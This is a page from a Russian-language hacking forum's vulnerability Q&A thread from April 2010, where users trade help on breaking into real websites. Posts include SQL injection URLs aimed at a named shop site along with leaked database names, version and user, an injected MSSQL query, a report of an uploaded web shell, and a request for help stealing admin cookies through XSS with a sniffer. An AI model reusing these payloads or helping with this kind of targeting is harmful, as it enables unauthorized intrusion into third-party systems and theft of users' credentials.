HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1254 из 2438 « Первая < 254754115412041244 1250 1251 1252 1253 1254 1255 1256 1257 1258 12641304135417542254 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #12531  
Старый 13.04.2010, 00:22
[Feldmarschall]
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
С нами: 8603287

Репутация: 87
По умолчанию
Цитата:
Сообщение от S[N]EP  
http://www.knife.ru/index.php?1=1&do=list&treeid=1+union+all+select+1 - вот вроде sql inj выводит ошибку
PHP код:
Ошибка запроса'select name,parentid from kn_tree where id=1 union all select 1' 
а если запрос изменить на:
http://www.knife.ru/index.php?1=1&do=list&treeid=1+union+all+select+1, 2
то ошибка уже
PHP код:
 Ошибка запроса'select typeid from kn_tree where id=1 union all select 1,2' 
что это значит? и как подобрать количество полей.?
кстати вот ещё http://www.knife.ru/index.php?1=1&do=list&treeid=1+order+by+1 терь ошибка вообще другая...

Version: 5.5.2-m2-log
Database: information_schema / knife / knife_forum / knife_phpbb2
Installation dir: /usr/local/
User: knife@localhost
слепая
з.ы щяс порыскаю может ище чтото найду
Последний раз редактировалось [Feldmarschall]; 13.04.2010 в 00:25..
 
Ответить с цитированием

  #12532  
Старый 13.04.2010, 00:56
FAQ666
Познающий
Регистрация: 17.09.2008
Сообщений: 56
С нами: 9288289

Репутация: 40
По умолчанию
Как определить какая СУБД?
вылазит такая ошибка
Вывода добиться не получилось
select top 1 * from dbo.OnlcPages where url_path_en in ('tenders/','tenders/c0/','tenders/c0/'--+a/') or url_path in ('tenders/','tenders/c0/','tenders/c0/'--+a/') order by url_path_en desc
 
Ответить с цитированием

  #12533  
Старый 13.04.2010, 02:25
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами: 9642449

Репутация: 606


По умолчанию
Цитата:
Сообщение от FAQ666  
Как определить какая СУБД?
вылазит такая ошибка
Вывода добиться не получилось
select top 1 * from dbo.OnlcPages where url_path_en in ('tenders/','tenders/c0/','tenders/c0/'--+a/') or url_path in ('tenders/','tenders/c0/','tenders/c0/'--+a/') order by url_path_en desc
MSSQL вроде
 
Ответить с цитированием

  #12534  
Старый 13.04.2010, 09:41
budden
Участник форума
Регистрация: 26.07.2008
Сообщений: 267
С нами: 9364549

Репутация: 184
По умолчанию
Так и есть, MSSQL.
 
Ответить с цитированием

  #12535  
Старый 13.04.2010, 23:23
GOGA075
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
С нами: 9534473

Репутация: 18
По умолчанию
Залил шел, а там только белая страница, в чом проблема может быть??
 
Ответить с цитированием

  #12536  
Старый 14.04.2010, 01:10
DeepBlue7
Познающий
Регистрация: 02.01.2009
Сообщений: 90
С нами: 9134867

Репутация: 44
По умолчанию
Вообщем возник такой вопрос... возможно ли абсолютно точно определить версию joomla 1.5 ?
Код:
  <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" />
Это то понятно... а именно какая можно пробить ?
 
Ответить с цитированием

  #12537  
Старый 14.04.2010, 01:15
[Feldmarschall]
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
С нами: 8603287

Репутация: 87
По умолчанию
Цитата:
Сообщение от DeepBlue7  
Вообщем возник такой вопрос... возможно ли абсолютно точно определить версию joomla 1.5 ?
Код:
  <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" />
Это то понятно... а именно какая можно пробить ?
no way man !
 
Ответить с цитированием

  #12538  
Старый 14.04.2010, 14:49
M@iL
Новичок
Регистрация: 26.12.2009
Сообщений: 2
С нами: 8618999

Репутация: 0
По умолчанию
нашёл хсс активную на одном интересном для меня сайте, но возникла проблема с кражей куков..
Приходят все строки в куках но bbpassword=hash не приходит..
в опере смотрю у себя куки, есть bbpassword=hash а смотрю в логах сниффера нет такова.. это какая то защита от кражи куков или я что то не так делаю ? как быть, что с хсс делать ? как в админку попасть)
 
Ответить с цитированием

  #12539  
Старый 14.04.2010, 14:56
Gedj
Познающий
Регистрация: 15.09.2008
Сообщений: 54
С нами: 9290631

Репутация: 46
По умолчанию
мы не экстрасенсы скинь сайт
 
Ответить с цитированием

  #12540  
Старый 14.04.2010, 15:34
M@iL
Новичок
Регистрация: 26.12.2009
Сообщений: 2
С нами: 8618999

Репутация: 0
По умолчанию
Сайт где именно не буду говорить ) просто может кто встречался с этим случием и знает что делать.. у меня такое не с одним сайтом вообще встречалось.. как так, в опере есть кук с хешем: bbpassword а сниффер не ловит его.. как быть..
Последний раз редактировалось M@iL; 14.04.2010 в 17:39..
 
Ответить с цитированием
Ответ
Страница 1254 из 2438 « Первая < 254754115412041244 1250 1251 1252 1253 1254 1255 1256 1257 1258 12641304135417542254 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.